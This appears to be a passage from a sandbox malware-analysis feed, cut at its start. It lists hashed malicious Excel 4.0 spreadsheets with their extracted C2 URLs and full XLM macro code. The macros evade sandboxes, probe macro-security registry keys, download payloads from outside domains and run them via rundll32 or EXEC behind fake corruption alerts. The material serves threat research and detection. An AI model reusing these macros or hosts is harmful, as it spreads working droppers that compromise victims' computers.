255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Qfliaq2Qmn\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bce868410ec0f6f364fed9f95e396ef2484748e054df91f976aba94fabb32756"},"analysis":{"reported":"2020-04-09T16:18:37Z","score":10},"files":[{"filename":"bce868410ec0f6f364fed9f95e396ef2484748e054df91f976aba94fabb32756","filesize":185344,"md5":"0bca9e5965b8835173954c961430f2d2","sha1":"f31266ef69d7fd72b26e5951a2c515e806950e9f","sha256":"bce868410ec0f6f364fed9f95e396ef2484748e054df91f976aba94fabb32756","sha512":"85bac576ad4437f68ef83602b9678651e25d69864f5e2c124f1ee50860d60a23578bb51b0645cf4e63a8596718d2b45551ec81eb905f1eb5c948d58ec5d238cd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bce868410ec0f6f364fed9f95e396ef2484748e054df91f976aba94fabb32756.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bcec1dea8694504807a8fc710ea0de40834c32c45408504738fec1cc6ff8fdf7"},"analysis":{"reported":"2020-04-09T16:18:37Z","score":10},"files":[{"filename":"bcec1dea8694504807a8fc710ea0de40834c32c45408504738fec1cc6ff8fdf7","filesize":141824,"md5":"7062ed7b97e496af97d0e7d330c3a3b0","sha1":"92f5b46545b164d0c6068aad3fd0160dd2050a71","sha256":"bcec1dea8694504807a8fc710ea0de40834c32c45408504738fec1cc6ff8fdf7","sha512":"88724e038c1ab0a9dbed9b533779a27de6c7e3cf67f913c3b288fc5dd26ce3febcd8d94d4720f1ec96b81a2c6b7ecb86521b593698378e96b2d216d0667a040c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bcec1dea8694504807a8fc710ea0de40834c32c45408504738fec1cc6ff8fdf7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"lddudeOXlm\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bcf919f0aa74d060479184fd8f360f21a3f7cb7f37fbb04c3500037298263219"},"analysis":{"reported":"2020-04-09T16:18:37Z","score":10},"files":[{"filename":"bcf919f0aa74d060479184fd8f360f21a3f7cb7f37fbb04c3500037298263219","filesize":226304,"md5":"1588ad7f3af7f494129cfbf4e9fa1320","sha1":"93e4710ebdc3971cbcbb13ff2fa85cf982e37d91","sha256":"bcf919f0aa74d060479184fd8f360f21a3f7cb7f37fbb04c3500037298263219","sha512":"852dc91a2d18abbd6d58b75f93fc24e632a5d37d7d5cface3ed9843451f4a357b91f2f72517845e9b0ba45e24fc50060a83cbb9d3251f32489a5f068652c9915","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bcf919f0aa74d060479184fd8f360f21a3f7cb7f37fbb04c3500037298263219.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"JxeSx4wKtq\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bd17c7534d7fb93eb66f0f3ec053debc5ca9b9841485c7e02471c2df036dbfc9"},"analysis":{"reported":"2020-04-09T16:18:37Z","score":10},"files":[{"filename":"bd17c7534d7fb93eb66f0f3ec053debc5ca9b9841485c7e02471c2df036dbfc9","filesize":170496,"md5":"eab2f1a5cfd3c3f755faf448cbf9c2ec","sha1":"81186aa2b6c2e525d02406a994c81cb9e4c60319","sha256":"bd17c7534d7fb93eb66f0f3ec053debc5ca9b9841485c7e02471c2df036dbfc9","sha512":"3edde8da9f952bdfd11792df578c6231a677671bc1312d70a151f0aec9fefcfd8e816ecf2d3ce4bf090e1a85a06a09df14e3380212df307f5085c88935c162a5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bd17c7534d7fb93eb66f0f3ec053debc5ca9b9841485c7e02471c2df036dbfc9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"l5oM9ahvvt\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bd1b756f9e836f011042c0018189e9d807f4ccc0fb4b2a95120eb0e556e756db"},"analysis":{"reported":"2020-04-09T16:18:37Z","score":10},"files":[{"filename":"bd1b756f9e836f011042c0018189e9d807f4ccc0fb4b2a95120eb0e556e756db","filesize":112128,"md5":"a9fd55dace593cba0475ce1c2ae95f72","sha1":"326c9117a26dbea00cd7d57beb7c4366245988de","sha256":"bd1b756f9e836f011042c0018189e9d807f4ccc0fb4b2a95120eb0e556e756db","sha512":"931d3c66a0ad49b1e4f0e0852abc0fe9336b0147fcd154d4a58941500cb55c294cd44c90d9d0c0a4ce574703b5e7a062fd7f2e34f1ce83f842a791a2bd58aec3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bd1b756f9e836f011042c0018189e9d807f4ccc0fb4b2a95120eb0e556e756db.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bd26c4a892632da42b2463d5f71685486656d2f0c29650b468e5eca17ab448bb"},"analysis":{"reported":"2020-04-09T16:18:37Z","score":10},"files":[{"filename":"bd26c4a892632da42b2463d5f71685486656d2f0c29650b468e5eca17ab448bb","filesize":170496,"md5":"7b9910ee073fbd1b6604f5ff41e84f8d","sha1":"bcd97822d32c5d2d72aac1a0bfb4107fe102c773","sha256":"bd26c4a892632da42b2463d5f71685486656d2f0c29650b468e5eca17ab448bb","sha512":"9ab80208b82a58ad3e2ada4196aa0e575c7aaca0699e6a7bc42e815406b4478a15b3de0bc5e080605dc5d7dd60bc279fada96833bcd1f9a79e8836a411ffdac9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bd26c4a892632da42b2463d5f71685486656d2f0c29650b468e5eca17ab448bb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"PkDwyzZkas\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bd2e092faf8eef54ce5621afac5bef47a27fd3267e6dac2dc3e50e699958938a"},"analysis":{"reported":"2020-04-09T16:18:37Z","score":10},"files":[{"filename":"bd2e092faf8eef54ce5621afac5bef47a27fd3267e6dac2dc3e50e699958938a","filesize":206336,"md5":"90930131ba5186c2694b4854d6b09dbd","sha1":"5bba646df24c34e290ec094f0972cbe790a8db85","sha256":"bd2e092faf8eef54ce5621afac5bef47a27fd3267e6dac2dc3e50e699958938a","sha512":"04ad4bb2e02328ab74f43f8ac31896f30d51e26cae964ba432c84f58e7e69669a81516c53e823402c4ad7ba4253cf7a53885989d4afaeb7c412d4ab836c8ff4e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bd2e092faf8eef54ce5621afac5bef47a27fd3267e6dac2dc3e50e699958938a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"2inMg8tjjh\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bd3b3ba1aa3a1af9ec3e3a86e420b950ad4cd32e72d3b4ed167cead95a8327ee"},"analysis":{"reported":"2020-04-09T16:18:37Z","score":10},"files":[{"filename":"bd3b3ba1aa3a1af9ec3e3a86e420b950ad4cd32e72d3b4ed167cead95a8327ee","filesize":170496,"md5":"1d6340e62c16519b9c4970ee3a57eee7","sha1":"ca42fb43bfd55ad13a8c1e86b5487967ede841c6","sha256":"bd3b3ba1aa3a1af9ec3e3a86e420b950ad4cd32e72d3b4ed167cead95a8327ee","sha512":"6746e1efbbe87d1558e8f9fc963f8da78dfb00af31e25d6483bc5bb989fe8023ce916e04ba394521d3c267115fe93aefd94d2bc454cd7cb2bb860f503ee2d292","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bd3b3ba1aa3a1af9ec3e3a86e420b950ad4cd32e72d3b4ed167cead95a8327ee.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Iift0t5s1Y\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bd3e9faf4a47bf778646dabc5e19879514e1ccdd70230f5e82835f3f513c4723"},"analysis":{"reported":"2020-04-09T16:18:38Z","score":10},"files":[{"filename":"bd3e9faf4a47bf778646dabc5e19879514e1ccdd70230f5e82835f3f513c4723","filesize":113664,"md5":"d4889a109b17eb283de283ce1cdd22ad","sha1":"48090710c15f618460658d445fc31065bda89c49","sha256":"bd3e9faf4a47bf778646dabc5e19879514e1ccdd70230f5e82835f3f513c4723","sha512":"b2a704853f96260fad4f966d288182af85b6d2e044d022a98e2644944a986820a5241e1ecdfe06cd58dbfca8b5db16741e7c4eb7de7d72052609a31378706824","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bd3e9faf4a47bf778646dabc5e19879514e1ccdd70230f5e82835f3f513c4723.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"O8qiQSG36Y\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bd457f5beb182b0bd7f221b9b376535850bb2eca3e2b47d3c6c8152bc8e9c07c"},"analysis":{"reported":"2020-04-09T16:18:38Z","score":10},"files":[{"filename":"bd457f5beb182b0bd7f221b9b376535850bb2eca3e2b47d3c6c8152bc8e9c07c","filesize":170496,"md5":"8274100f932571ffe13df678918b0bca","sha1":"17f0069c426ad5141e0a0b808d35a43b03a4fc30","sha256":"bd457f5beb182b0bd7f221b9b376535850bb2eca3e2b47d3c6c8152bc8e9c07c","sha512":"e4ca7d65c6dcc019702af7d7248454858016e9927a875a5ffc1234c3cdfc3287ffd95e1508fe7b20b05d91599fa727f7a9ac1ffe5dfc0d055c6a7c2e26d4a8bc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bd457f5beb182b0bd7f221b9b376535850bb2eca3e2b47d3c6c8152bc8e9c07c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1qGmnMCWZE\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bd4fa0069cae79ab52588d4af537fb5fae570a3dc40a96bad88812f56e8a0a71"},"analysis":{"reported":"2020-04-09T16:18:38Z","score":10},"files":[{"filename":"bd4fa0069cae79ab52588d4af537fb5fae570a3dc40a96bad88812f56e8a0a71","filesize":209920,"md5":"5fd1433dada49bd700da3cd0dd9d5005","sha1":"20a7886677b1b3ecf69e93f9fa4d28394db15ab8","sha256":"bd4fa0069cae79ab52588d4af537fb5fae570a3dc40a96bad88812f56e8a0a71","sha512":"e21595a3ae90dde79b0ddb3693caf48b23c6ce934147a657b60c5b8fccc01deaa9285826233adce7fa59842f3fd2fda173a2f9ab93de49d5708454e7b9ab97a1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bd4fa0069cae79ab52588d4af537fb5fae570a3dc40a96bad88812f56e8a0a71.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"djvWXfo5Aa\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bd5ff007bc434ff7d43496604430b366d785502bd7549d33659f4321182d4727"},"analysis":{"reported":"2020-04-09T16:18:38Z","score":10},"files":[{"filename":"bd5ff007bc434ff7d43496604430b366d785502bd7549d33659f4321182d4727","filesize":185344,"md5":"1cb76178800c1cc28f3fbfa4c3adb465","sha1":"4a287884af5bf25e2a8e594333cbe774b0a8af6b","sha256":"bd5ff007bc434ff7d43496604430b366d785502bd7549d33659f4321182d4727","sha512":"e76ed61c01b34f6b9beb5ab5dff063f4f8b2531ea811bf37a4fbec02b96689dd96aa0e1673d049b99b22e43e8f2056ab098806bf824f35d60698eb6bf7b538f0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bd5ff007bc434ff7d43496604430b366d785502bd7549d33659f4321182d4727.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bda026b5a53f8ff0dc03b564f0c54a7d3f1cc0dfdf2a3d37414c2dd02c564592"},"analysis":{"reported":"2020-04-09T16:18:38Z","score":10},"files":[{"filename":"bda026b5a53f8ff0dc03b564f0c54a7d3f1cc0dfdf2a3d37414c2dd02c564592","filesize":126464,"md5":"08e045cc03eb876127848e07d0d581c6","sha1":"7b3a7d4cd990a14e16b82611bffa4ab585daab4b","sha256":"bda026b5a53f8ff0dc03b564f0c54a7d3f1cc0dfdf2a3d37414c2dd02c564592","sha512":"4a8499d0eddfc5177a9a9c9663d030cf1bd65308144d62aeff24b2664b00b4f8e077cf8ac7f9ffec361630d309f39e24703b072f1fb07a025872b1e09e9cc2b6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bda026b5a53f8ff0dc03b564f0c54a7d3f1cc0dfdf2a3d37414c2dd02c564592.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://march262020.club/files/bot.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\XTHbSJX\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\XTHbSJX\\hQPDpQm\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://march262020.club/files/bot.dl\",\"C:\\XTHbSJX\\hQPDpQm\\yNuMyDc.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\XTHbSJX\\hQPDpQm\\yNuMyDc.dll,DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bda124b3addf9b61db60ec1102be97cdf127a6a2ea5e32d2d651a6a6c05adb4a"},"analysis":{"reported":"2020-04-09T16:18:38Z","score":10},"files":[{"filename":"bda124b3addf9b61db60ec1102be97cdf127a6a2ea5e32d2d651a6a6c05adb4a","filesize":209408,"md5":"b1660c4e9a15a7b33da232715cc7b6cf","sha1":"3b2a0524fc316f479860fef1175735526085df47","sha256":"bda124b3addf9b61db60ec1102be97cdf127a6a2ea5e32d2d651a6a6c05adb4a","sha512":"7d257795b2d13c3a5d669cff0c1740fd7269de7ad52e06226d5465f590099610f0e79522449b144645a160ee9cf5bfda61e5288e326fa893f419a0538234b3fa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bda124b3addf9b61db60ec1102be97cdf127a6a2ea5e32d2d651a6a6c05adb4a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"EOCYMzeYGV\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bda3424792f66b2008f8441ed67d393fd69f0029098a36acc0130cbba7455af6"},"analysis":{"reported":"2020-04-09T16:18:38Z","score":10},"files":[{"filename":"bda3424792f66b2008f8441ed67d393fd69f0029098a36acc0130cbba7455af6","filesize":104448,"md5":"b8631823aabebaff013a065951a28eb5","sha1":"3fc386250d41dd2589c41876fdbd21c51c883d4a","sha256":"bda3424792f66b2008f8441ed67d393fd69f0029098a36acc0130cbba7455af6","sha512":"d1b22a02d5e140dfa798bedfc5f593e6622c95b89cefc24f4d416694183dc5badbdfa7f30d4efe28f387b44a97c1c93bc896f83dc7987013ab1b1979f7f475e7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bda3424792f66b2008f8441ed67d393fd69f0029098a36acc0130cbba7455af6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"9qM2a92dFo\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
